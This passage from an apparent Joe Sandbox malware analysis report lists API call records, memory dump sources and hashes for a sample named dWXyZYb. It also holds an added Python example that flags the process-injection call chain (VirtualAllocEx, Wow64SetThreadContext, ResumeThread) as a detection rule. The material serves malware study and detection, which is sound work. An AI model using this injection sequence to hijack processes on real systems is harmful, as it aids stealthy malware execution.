                                                                                        • Instruction Fuzzy Hash: BC2168B1D003098FDB10DFAAC5857EEBBF4AF88314F14C42AD959A7281C7789984CFA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 012FD737
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.1823772736.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_12f0000_dWXyZYb.jbxd
                                                                                        Similarity
                                                                                        • API ID: DuplicateHandle
                                                                                        • String ID:
                                                                                        • API String ID: 3793708945-0
                                                                                        • Opcode ID: 790a0fea3a45a2f96abf104a3fbdbcf1d1423b2e5e7fdf7b370edac3771a5694
                                                                                        • Instruction ID: 91ce45ebae2c10aa91a8d7b52b87a277a42ec0d5e4a63eda3f8272bf36ca02da
                                                                                        • Opcode Fuzzy Hash: 790a0fea3a45a2f96abf104a3fbdbcf1d1423b2e5e7fdf7b370edac3771a5694
                                                                                        • Instruction Fuzzy Hash: C721F2B5900258DFDB10CFAAD584AEEFFF4EB48310F14802AE954A7210C374A941CFA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0990DCB8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.1841265819.0000000009900000.00000040.00000800.00020000.00000000.sdmp, Offset: 09900000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_9900000_dWXyZYb.jbxd
                                                                                        Similarity
                                                                                        • API ID: MemoryProcessRead
                                                                                        • String ID:
                                                                                        • API String ID: 1726664587-0
                                                                                        • Opcode ID: 1679b4e90be821d46bec1f8eecf8ab33ed489caea32a9e7140a45b170e77b4ca
                                                                                        • Instruction ID: 42f7e8259b77a02d1a419bdbd450f20d0d868f6797cd4b2bfbf5a9f704915e80
                                                                                        • Opcode Fuzzy Hash: 1679b4e90be821d46bec1f8eecf8ab33ed489caea32a9e7140a45b170e77b4ca
                                                                                        • Instruction Fuzzy Hash: 5D2114B5C003599FCB10DFA9C985AEEBBF5FF48320F10842AE958A7250C7789545DBA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0990DCB8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.1841265819.0000000009900000.00000040.00000800.00020000.00000000.sdmp, Offset: 09900000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_9900000_dWXyZYb.jbxd
                                                                                        Similarity
                                                                                        • API ID: MemoryProcessRead
                                                                                        • String ID:
                                                                                        • API String ID: 1726664587-0
                                                                                        • Opcode ID: 45b307f75b19198d4027333cd4e4388f354908adf76831be64cb477fa7b20b89
                                                                                        • Instruction ID: 1992da9365736ba5426542af363b4c45869ba7214cafcd90fab3f9ad5c5ac17d
                                                                                        • Opcode Fuzzy Hash: 45b307f75b19198d4027333cd4e4388f354908adf76831be64cb477fa7b20b89
                                                                                        • Instruction Fuzzy Hash: C62139B1C003599FCB10DFAAC940ADEFBF5FF48320F108429E558A7250C7759544CBA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0990D5F6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.1841265819.0000000009900000.00000040.00000800.00020000.00000000.sdmp, Offset: 09900000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_9900000_dWXyZYb.jbxd
                                                                                        Similarity
                                                                                        • API ID: ContextThreadWow64
                                                                                        • String ID:
                                                                                        • API String ID: 983334009-0
                                                                                        • Opcode ID: d9afb420147259b662cfab898ca8ced99c41e67c1bff2c3cbc92609a4db0db86
                                                                                        • Instruction ID: f0c672dcc2451ffb0b912a0b52679bbc96fc4dc1c0225a2caa87c00f3c93ff2a
                                                                                        • Opcode Fuzzy Hash: d9afb420147259b662cfab898ca8ced99c41e67c1bff2c3cbc92609a4db0db86
                                                                                        • Instruction Fuzzy Hash: 0B2138B1D003098FDB10DFAAC4857EEBBF4EF89324F108429D559A7281CB789944CFA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 012FD737
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.1823772736.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_12f0000_dWXyZYb.jbxd
                                                                                        Similarity
                                                                                        • API ID: DuplicateHandle
                                                                                        • String ID:
                                                                                        • API String ID: 3793708945-0
                                                                                        • Opcode ID: 991a87275135c9f80204205fbc809b71dd88847a7f827cb4d08b1ce8d3439014
                                                                                        • Instruction ID: 1ef01464e64f982ad5b8306bb25668869b4e25d13a2cc85830e1efa15fd99450
                                                                                        • Opcode Fuzzy Hash: 991a87275135c9f80204205fbc809b71dd88847a7f827cb4d08b1ce8d3439014
                                                                                        • Instruction Fuzzy Hash: 5721E3B5900258DFDB10CF9AD584ADEFBF4EB48310F14841AE954A7250D374A940CFA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,012FB099,00000800,00000000,00000000), ref: 012FB2AA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.1823772736.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_12f0000_dWXyZYb.jbxd
                                                                                        Similarity
                                                                                        • API ID: LibraryLoad
                                                                                        • String ID:
                                                                                        • API String ID: 1029625771-0
                                                                                        • Opcode ID: ff234691f7308c3e1aaf86447acf37e039bfeca3db3a209b5f872ffd6d03aec8
                                                                                        • Instruction ID: 2aefed8eae8f6cbc26f78a85866dccacf3334af3bddb991265d10030fb9bee17
                                                                                        • Opcode Fuzzy Hash: ff234691f7308c3e1aaf86447acf37e039bfeca3db3a209b5f872ffd6d03aec8
                                                                                        • Instruction Fuzzy Hash: AA1126B6D103098FDB10CF9AC544ADEFBF4EB49320F10842ED619A7210C375A545CFA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,012FB099,00000800,00000000,00000000), ref: 012FB2AA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.1823772736.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_12f0000_dWXyZYb.jbxd
                                                                                        Similarity
                                                                                        • API ID: LibraryLoad
                                                                                        • String ID:
                                                                                        • API String ID: 1029625771-0
                                                                                        • Opcode ID: 3a651a459885a3e051059395e41971adbb025f8dba34c82ffeee081f213fb670
                                                                                        • Instruction ID: a26666b6b7c732435c2c0105378650693b42279fb481d1ac7ffa31591912f9ee
                                                                                        • Opcode Fuzzy Hash: 3a651a459885a3e051059395e41971adbb025f8dba34c82ffeee081f213fb670
                                                                                        • Instruction Fuzzy Hash: CB1123B6C003099FDB10CFAAD844ADEFBF4EB89320F10842EDA19A7610C375A545CFA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0990DAF6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.1841265819.0000000009900000.00000040.00000800.00020000.00000000.sdmp, Offset: 09900000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_9900000_dWXyZYb.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 4275171209-0
                                                                                        • Opcode ID: e4cc3621ab2198ce01f3df166b5301f5e4200e2381a1468f9d3b08a3e50aa797
                                                                                        • Instruction ID: 1a538d63847632b287f2fac7fb0ae516be5fe13cc1fb82576d079300a2b0900f
                                                                                        • Opcode Fuzzy Hash: e4cc3621ab2198ce01f3df166b5301f5e4200e2381a1468f9d3b08a3e50aa797
                                                                                        • Instruction Fuzzy Hash: 761156B68002488FCB10DFA9C945BEEBFF5AF88320F148819E569A7290C7759544CFA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0990DAF6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.1841265819.0000000009900000.00000040.00000800.00020000.00000000.sdmp, Offset: 09900000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_9900000_dWXyZYb.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 4275171209-0
                                                                                        • Opcode ID: a702ddf7b655e53bbd41556b8e1826cdfa2298e6e1b02294083e8e27786ca444
                                                                                        • Instruction ID: 4e4b3d3d2ad237b29a4e2fd7ecdc0f8a6052804118dda9bcae71e8a0585c1108
                                                                                        • Opcode Fuzzy Hash: a702ddf7b655e53bbd41556b8e1826cdfa2298e6e1b02294083e8e27786ca444
                                                                                        • Instruction Fuzzy Hash: F51156B68002488FCB10DFA9C945BDEBFF5EF88320F14881AE559A7250C7759544CFA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0990DAF6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.1841265819.0000000009900000.00000040.00000800.00020000.00000000.sdmp, Offset: 09900000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_9900000_dWXyZYb.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 4275171209-0
                                                                                        • Opcode ID: 1190e17f997da28602be256bc035f90d9583d11b177a1cc850ebe26fd3f18e94
                                                                                        • Instruction ID: 233f9cd674535fde957a092534046e7f5e42b165648a9840d07f224a39e5bcb7
                                                                                        • Opcode Fuzzy Hash: 1190e17f997da28602be256bc035f90d9583d11b177a1cc850ebe26fd3f18e94
                                                                                        • Instruction Fuzzy Hash: 011126B19002499FCB10DFAAC844ADEBFF5EB89320F148419E559A7250C775A554CFA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.1841265819.0000000009900000.00000040.00000800.00020000.00000000.sdmp, Offset: 09900000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_9900000_dWXyZYb.jbxd
                                                                                        Similarity
                                                                                        • API ID: ResumeThread
                                                                                        • String ID:
                                                                                        • API String ID: 947044025-0
                                                                                        • Opcode ID: 9bdd4351d8d3f1f4a4146d34f53b46f94b7b65d5d1add8c9321f9321f07ac119
                                                                                        • Instruction ID: 9d36c034825a64b2f195a993e03ad084e357205ed6159db000024bcd9ee603c2
                                                                                        • Opcode Fuzzy Hash: 9bdd4351d8d3f1f4a4146d34f53b46f94b7b65d5d1add8c9321f9321f07ac119
                                                                                        • Instruction Fuzzy Hash: 641155B1D003088FDB20DFAAC5457EEFBF4AF89324F20882AC559A7290C734A585CF95
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.1841265819.0000000009900000.00000040.00000800.00020000.00000000.sdmp, Offset: 09900000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_9900000_dWXyZYb.jbxd
                                                                                        Similarity
                                                                                        • API ID: ResumeThread
                                                                                        • String ID:
                                                                                        • API String ID: 947044025-0
                                                                                        • Opcode ID: 477a49862780222ff3ca688c37403e973f43af00fbe0dba522ad19ab07e3980e
                                                                                        • Instruction ID: 75b66cc4816496eaff22e285bff03824a781dc1ed0c0656c5656af0f185c6fd9
                                                                                        • Opcode Fuzzy Hash: 477a49862780222ff3ca688c37403e973f43af00fbe0dba522ad19ab07e3980e
                                                                                        • Instruction Fuzzy Hash: 721158B1D003088FCB20DFA9C5457EEFBF4AF88324F20841AC559A7290C734A544CF95
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.1841265819.0000000009900000.00000040.00000800.00020000.00000000.sdmp, Offset: 09900000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_9900000_dWXyZYb.jbxd
                                                                                        Similarity
                                                                                        • API ID: ResumeThread
                                                                                        • String ID:
                                                                                        • API String ID: 947044025-0
                                                                                        • Opcode ID: 7c121be2ce5f0f2e531d0c32aa526f99ec4ddc8de644264c3ff9af57fa24dd62
                                                                                        • Instruction ID: 2a591149b423a7f4f2f4cd5ee6acda5063d6f3eb5f9facda589ca3f69a80e2b6
                                                                                        • Opcode Fuzzy Hash: 7c121be2ce5f0f2e531d0c32aa526f99ec4ddc8de644264c3ff9af57fa24dd62
                                                                                        • Instruction Fuzzy Hash: 941125B1D003488FCB20DFAAC4457EEFBF4EB89324F208429D559A7290CB75A944CFA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%
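
Taken together, the records above from the 09900000 region of process 9 (VirtualAllocEx, ReadProcessMemory, Wow64SetThreadContext and ResumeThread) are the call set behind the "Injects a PE file into a foreign processes" and "Creates a process in suspended mode" signatures. The following is an added example, not Joe Sandbox output or code: it parses function records in the plain-text shape shown on this page, groups the API IDs by the dump region they came from, and flags a region that carries the full chain. The sample records are condensed copies of entries visible above; the record-splitting regexes and the choice of which API IDs make up an injection chain are this example's own assumptions, not a Joe Sandbox rule.

```python
"""Correlate Joe Sandbox function records into a per-region injection verdict."""
import re
from collections import defaultdict

# Constructed sample: condensed copies of records from this report (PID 9).
# Field layout follows the report; hashes and uniqueness fields are dropped.
SAMPLE_RECORDS = """\
APIs
• VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0990DAF6
Memory Dump Source
• Source File: 00000009.00000002.1841265819.0000000009900000.00000040.00000800.00020000.00000000.sdmp, Offset: 09900000, based on PE: false
Similarity
• API ID: AllocVirtual

APIs
• ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0990DCB8
Memory Dump Source
• Source File: 00000009.00000002.1841265819.0000000009900000.00000040.00000800.00020000.00000000.sdmp, Offset: 09900000, based on PE: false
Similarity
• API ID: MemoryProcessRead

APIs
• Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0990D5F6
Memory Dump Source
• Source File: 00000009.00000002.1841265819.0000000009900000.00000040.00000800.00020000.00000000.sdmp, Offset: 09900000, based on PE: false
Similarity
• API ID: ContextThreadWow64

APIs
Memory Dump Source
• Source File: 00000009.00000002.1841265819.0000000009900000.00000040.00000800.00020000.00000000.sdmp, Offset: 09900000, based on PE: false
Similarity
• API ID: ResumeThread

APIs
• LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,012FB099,00000800,00000000,00000000), ref: 012FB2AA
Memory Dump Source
• Source File: 00000009.00000002.1823772736.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false
Similarity
• API ID: LibraryLoad
"""

# Assumed record shape (matches the entries on this page, not a documented format).
RECORD_API = re.compile(r"•\s+(\w+)\.(\w+)\(")
RECORD_SOURCE = re.compile(r"Source File:\s+(\S+),\s+Offset:\s+([0-9A-Fa-f]+)")
RECORD_APIID = re.compile(r"API ID:\s+(\S+)")

# Heuristic chosen for this example: one region that allocates in a remote
# process, rewrites a thread context and resumes the thread is doing
# thread-hijack style injection. API IDs are the strings Joe Sandbox prints.
INJECTION_CORE = {"AllocVirtual", "ContextThreadWow64", "ResumeThread"}
INJECTION_SUPPORT = {"MemoryProcessRead"}


def parse_records(text):
    """Yield one dict per blank-line-separated function record."""
    for chunk in re.split(r"\n\s*\n", text.strip()):
        src = RECORD_SOURCE.search(chunk)
        api_id = RECORD_APIID.search(chunk)
        if not (src and api_id):
            continue  # not a function record, or truncated
        api = RECORD_API.search(chunk)
        # The first dotted field of the dump name is the PID in hex.
        pid = int(src.group(1).split(".")[0], 16)
        yield {
            "pid": pid,
            "offset": src.group(2).upper(),
            "api_id": api_id.group(1),
            # Some records (ResumeThread above) list no call site; keep None.
            "api": api.group(1) if api else None,
            "module": api.group(2) if api else None,
        }


def apis_by_region(text):
    """Map (pid, region offset) -> set of API IDs seen in that region."""
    regions = defaultdict(set)
    for rec in parse_records(text):
        regions[(rec["pid"], rec["offset"])].add(rec["api_id"])
    return dict(regions)


def find_injection_regions(text):
    """Return [(pid, offset, matched API IDs)] for regions with the full core chain."""
    hits = []
    for (pid, offset), ids in sorted(apis_by_region(text).items()):
        if INJECTION_CORE <= ids:
            hits.append((pid, offset, sorted(ids & (INJECTION_CORE | INJECTION_SUPPORT))))
    return hits


if __name__ == "__main__":
    for pid, offset, ids in find_injection_regions(SAMPLE_RECORDS):
        print(f"PID {pid} region {offset}: injection chain {ids}")
```

Grouping by dump region rather than by process is deliberate: the 012F0000 region of the same process only resolves and loads libraries, and it should not inherit the verdict from the 09900000 region that does the injection. WriteProcessMemory is not among the records shown in this part of the report, so it is not part of the rule.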

                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 012FB01E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.1823772736.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_12f0000_dWXyZYb.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleModule
                                                                                        • String ID:
                                                                                        • API String ID: 4139908857-0
                                                                                        • Opcode ID: 0f306f528e51c81fdf08626b337ab534fb320875498e3075ece6ef065fcab699
                                                                                        • Instruction ID: aec4c2ab9fd6413048d989737c74a4df0db879c7fca5bafc91485fda65e52e1b
                                                                                        • Opcode Fuzzy Hash: 0f306f528e51c81fdf08626b337ab534fb320875498e3075ece6ef065fcab699
                                                                                        • Instruction Fuzzy Hash: C7110FB5C002498FDB10CF9AD444ADEFBF4AB88324F10842EDA28A7210D375A545CFA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • PostMessageW.USER32(?,?,?,?), ref: 08FC1935
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.1840621428.0000000008FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08FC0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_8fc0000_dWXyZYb.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessagePost
                                                                                        • String ID:
                                                                                        • API String ID: 410705778-0
                                                                                        • Opcode ID: 5e5b5f12c1ee7047eac88a940889305217c28a256c5c49738a3e4bc5154593a5
                                                                                        • Instruction ID: f8f588c5dc1c6abf8d9e16968764ec43fb02d4afc1f9780d5dbe5edaa3321b7a
                                                                                        • Opcode Fuzzy Hash: 5e5b5f12c1ee7047eac88a940889305217c28a256c5c49738a3e4bc5154593a5
                                                                                        • Instruction Fuzzy Hash: 9111F2B5800249CFDB10DF9AC645BDEBBF4EB48320F20841AD558A7651C374A694CFA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • PostMessageW.USER32(?,?,?,?), ref: 08FC1935
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.1840621428.0000000008FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08FC0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_8fc0000_dWXyZYb.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessagePost
                                                                                        • String ID:
                                                                                        • API String ID: 410705778-0
                                                                                        • Opcode ID: 24619f76815b8fa1d194ba9b927581f2977a882157dd6f0befd02dc69e9427bb
                                                                                        • Instruction ID: c7080edc97f27ee2441b4400ea092e13562679cb005623be05a77df8d043add2
                                                                                        • Opcode Fuzzy Hash: 24619f76815b8fa1d194ba9b927581f2977a882157dd6f0befd02dc69e9427bb
                                                                                        • Instruction Fuzzy Hash: C21103B58003499FCB10DF9AC544BDEFBF8EB49320F108419E558A7610C375A694CFA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • PostMessageW.USER32(?,?,?,?), ref: 08FC1935
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.1840621428.0000000008FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08FC0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_8fc0000_dWXyZYb.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessagePost
                                                                                        • String ID:
                                                                                        • API String ID: 410705778-0
                                                                                        • Opcode ID: 54cb36f052ffe3af2a3e987cb48ae1301144de5eaf57de67d4e8dfbc98ae88a9
                                                                                        • Instruction ID: 1c209b88dc797fca070a963e8471f0ec359efd341573b46152397819484e2a1a
                                                                                        • Opcode Fuzzy Hash: 54cb36f052ffe3af2a3e987cb48ae1301144de5eaf57de67d4e8dfbc98ae88a9
                                                                                        • Instruction Fuzzy Hash: 881103B5800249DFDB10CF99C545BDEBBF4EB48320F10841AD958A7650C374A694CFA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.1823395366.000000000129D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0129D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_129d000_dWXyZYb.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f4adc055aa793f013e028a4949069fe38e7fe9f7016667987c4e0298437e5822
                                                                                        • Instruction ID: f5168cefd319d54fd63455be3d79481f10298cae30e27d455c39c967e20775d4
                                                                                        • Opcode Fuzzy Hash: f4adc055aa793f013e028a4949069fe38e7fe9f7016667987c4e0298437e5822
                                                                                        • Instruction Fuzzy Hash: 45214575110208DFDF01DF4CC9C0B6ABF65FB88324F20C16DEA090B25AC33AE446DAA2
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.1823527109.00000000012AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012AD000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_12ad000_dWXyZYb.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 5dec96502a32a74f86f852fd373e6350494b27d9a8ee8dc5991a95211f495148
                                                                                        • Instruction ID: ffa64ab6cebec9c618dfeb10ee761fc0a0bf756fde56c6242040ee7c109ec5f7
                                                                                        • Opcode Fuzzy Hash: 5dec96502a32a74f86f852fd373e6350494b27d9a8ee8dc5991a95211f495148
                                                                                        • Instruction Fuzzy Hash: CC216470294208DFCB11DF68D9C0B26BFA1FB88314F60C56DD90A4B656C37BD407CA61
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.1823527109.00000000012AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012AD000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_12ad000_dWXyZYb.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 45187ff6465b283bb8d9e233ab31898c1432f48c9e2f75189b3216ccd282cf09
                                                                                        • Instruction ID: fe10be587888b007c5a38d6662418468528b8e0a6189df10f4dc1bf9fad838ae
                                                                                        • Opcode Fuzzy Hash: 45187ff6465b283bb8d9e233ab31898c1432f48c9e2f75189b3216ccd282cf09
                                                                                        • Instruction Fuzzy Hash: 29214671514208EFDB01DF98CAC0B26BBA5FB84324F60C66DE9094B657C37AD846CA61
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.1823527109.00000000012AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012AD000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_12ad000_dWXyZYb.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 4ce8673a6f43958d6b80a0f5c8b328d8298d3819c10128f122ceeb6f3c9a8c0d
                                                                                        • Instruction ID: a6c97783be22603693a32aa6bc9802ded76a8556a328c31105b4246d2312d2b7
                                                                                        • Opcode Fuzzy Hash: 4ce8673a6f43958d6b80a0f5c8b328d8298d3819c10128f122ceeb6f3c9a8c0d
                                                                                        • Instruction Fuzzy Hash: 1221B0714483849FCB03CF24D994711BF71EB46314F28C5DAD9498F6A7C33A980ACB62
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.1823395366.000000000129D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0129D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_129d000_dWXyZYb.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                        • Instruction ID: b764bab9ad2111ec1927312e9b7676b66e75f7da5ebc5a371d0bd8106c990c28
                                                                                        • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                        • Instruction Fuzzy Hash: 4011DF76404284CFDF02CF48D5C4B56BF71FB94324F24C2A9D9090B256C33AE45ADBA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.1823527109.00000000012AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012AD000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_12ad000_dWXyZYb.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                        • Instruction ID: 6cbf149e0b167613253fcf4347b9d45a4fff452cebfbc2f244c48e1e8f304eae
                                                                                        • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                        • Instruction Fuzzy Hash: 2511BB75504284DFDB02CF54C5C4B15BFA1FB84324F24C6AAD9494B6A7C33AD40ACB61
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.1823395366.000000000129D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0129D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_129d000_dWXyZYb.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: fdc28af10db42ed80af907f94a95c7268effc922166b3692b13c1843fa4d3735
                                                                                        • Instruction ID: a6effcd7c708a456252d34fe14b072f1cfee41800eb01af15d7c64ffb990e992
                                                                                        • Opcode Fuzzy Hash: fdc28af10db42ed80af907f94a95c7268effc922166b3692b13c1843fa4d3735
                                                                                        • Instruction Fuzzy Hash: 2F012B310183889AEB154EADCDC4BAFFFD8DF41324F08C52AEE080B286D279D840D6B1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000009.00000002.1823395366.000000000129D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0129D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_9_2_129d000_dWXyZYb.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 25b74c97062ae38a9a8f4947e679781c067a95d18143c3e1845dc47e977bb7ac
                                                                                        • Instruction ID: 92a2da358d249ea959121c613026bab31e5d740d543347e25baceb0e7c842dc8
